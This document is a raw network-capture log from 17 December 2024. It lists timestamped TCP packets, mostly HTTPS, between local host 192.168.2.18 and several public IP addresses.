                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.169387102 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.169439077 CET49777443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.169445992 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.169476986 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.169573069 CET49777443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.169583082 CET44349777172.67.208.33192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.169595003 CET49777443192.168.2.18172.67.208.33
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.183870077 CET4434977913.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.183891058 CET4434977913.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.183943033 CET49779443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.183955908 CET4434977913.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.183993101 CET49779443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.184007883 CET49779443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.214595079 CET4434977913.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.214679956 CET4434977913.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.214771032 CET49779443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.214915037 CET49779443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.214941978 CET4434977913.248.243.5192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.214951038 CET49779443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.214984894 CET49779443192.168.2.1813.248.243.5
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.312261105 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.312302113 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.312377930 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.312717915 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.312735081 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.313466072 CET49785443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.313498974 CET44349785104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.313560963 CET49785443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.314097881 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.314120054 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.314193964 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.314414978 CET49785443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.314429045 CET44349785104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.314656019 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.314668894 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.569385052 CET804970376.223.105.230192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.569406033 CET804970376.223.105.230192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.569480896 CET4970380192.168.2.1876.223.105.230
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.698678017 CET804970476.223.105.230192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.698712111 CET804970476.223.105.230192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:58.698787928 CET4970480192.168.2.1876.223.105.230
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.528675079 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.529162884 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.529181004 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.530298948 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.530559063 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.532207012 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.532207012 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.532219887 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.532273054 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.535604000 CET44349785104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.535856962 CET49785443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.535875082 CET44349785104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.537309885 CET44349785104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.537568092 CET49785443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.538774014 CET49785443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.538774014 CET49785443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.538785934 CET44349785104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.538861990 CET44349785104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.544168949 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.544404030 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.544410944 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.546894073 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.547199011 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.548295021 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.548295021 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.548309088 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.548506021 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.585911036 CET49785443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.585917950 CET44349785104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.585936069 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.585947037 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.601875067 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.601892948 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.632904053 CET49785443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.632921934 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.647933006 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.990333080 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.990381956 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.990402937 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.990442038 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.990464926 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.990515947 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.990528107 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.995572090 CET44349785104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.995661020 CET44349785104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.995724916 CET49785443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.996157885 CET49785443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.996175051 CET44349785104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.998153925 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.998308897 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.998318911 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.998346090 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.998378038 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.998469114 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.998815060 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:20:59.998826027 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.006125927 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.006254911 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.006263971 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.006313086 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.006364107 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.007340908 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.007352114 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.007406950 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.007544041 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.007551908 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.015331030 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.015433073 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.015443087 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.022578955 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.022665024 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.022690058 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.022699118 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.022707939 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.022739887 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.023813963 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.025248051 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.025259018 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.034146070 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.035248041 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.035257101 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.078072071 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.078072071 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.125916958 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.168886900 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.168898106 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.201715946 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.201781988 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.201813936 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.211976051 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.212025881 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.212034941 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.220657110 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.220706940 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.220716000 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.224148989 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.224167109 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.224189043 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.224200010 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.224225998 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.224229097 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.224247932 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.224267960 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.224283934 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.229266882 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.229315042 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.229322910 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.238023043 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.238058090 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.238076925 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.238085032 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.238128901 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.246396065 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.255188942 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.255247116 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.255264997 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.263684988 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.263732910 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.263741970 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.268397093 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.268409014 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.268451929 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.268477917 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.268481016 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.268496037 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.268537045 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.268554926 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.271617889 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.271672010 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.271682024 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.279869080 CET49679443192.168.2.1852.182.141.63
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.285727978 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.285795927 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.285820961 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.292913914 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.292968035 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.292975903 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.300188065 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.300218105 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.300244093 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.300254107 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.300293922 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.300299883 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.300327063 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.300371885 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.300528049 CET49786443192.168.2.18104.17.24.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.300540924 CET44349786104.17.24.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.394874096 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.394896984 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.394975901 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.394995928 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.395051956 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.420358896 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.420396090 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.420453072 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.420466900 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.420512915 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.436595917 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.436671019 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.436691046 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.436712027 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.436752081 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.437103987 CET49784443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.437128067 CET44349784151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.444724083 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.444763899 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.444858074 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.445075989 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.445089102 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.581542969 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.581582069 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.581655025 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.581887960 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:00.581902981 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.209804058 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.210340023 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.210374117 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.210778952 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.211328983 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.211328983 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.211358070 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.211416960 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.266045094 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.659379005 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.659935951 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.659955978 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.661422014 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.661870003 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.661870003 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.661951065 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.662062883 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.664019108 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.664067030 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.664443016 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.664452076 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.664707899 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.664813042 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.664819002 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.672168016 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.672425032 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.672430992 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.680594921 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.680682898 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.680687904 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.707329035 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.711360931 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.711376905 CET44349791104.17.25.14192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.726969957 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.726983070 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.763333082 CET49791443192.168.2.18104.17.25.14
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.774936914 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.784523010 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.788662910 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.789031982 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.789043903 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.797251940 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.797508955 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.797523022 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.800888062 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.801259995 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.801259995 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.801359892 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.801425934 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.839744091 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.843369961 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.853929043 CET49792443192.168.2.18151.101.130.137
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.853944063 CET44349792151.101.130.137192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.856847048 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.860497952 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.860800982 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.860811949 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.868246078 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.868565083 CET49788443192.168.2.18104.18.94.41
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.868572950 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.876296043 CET44349788104.18.94.41192.168.2.18
                                                                                                                                                                                                                          Dec 17, 2024 18:21:01.879061937 CET49788443192.168.2.18104.18.94.41
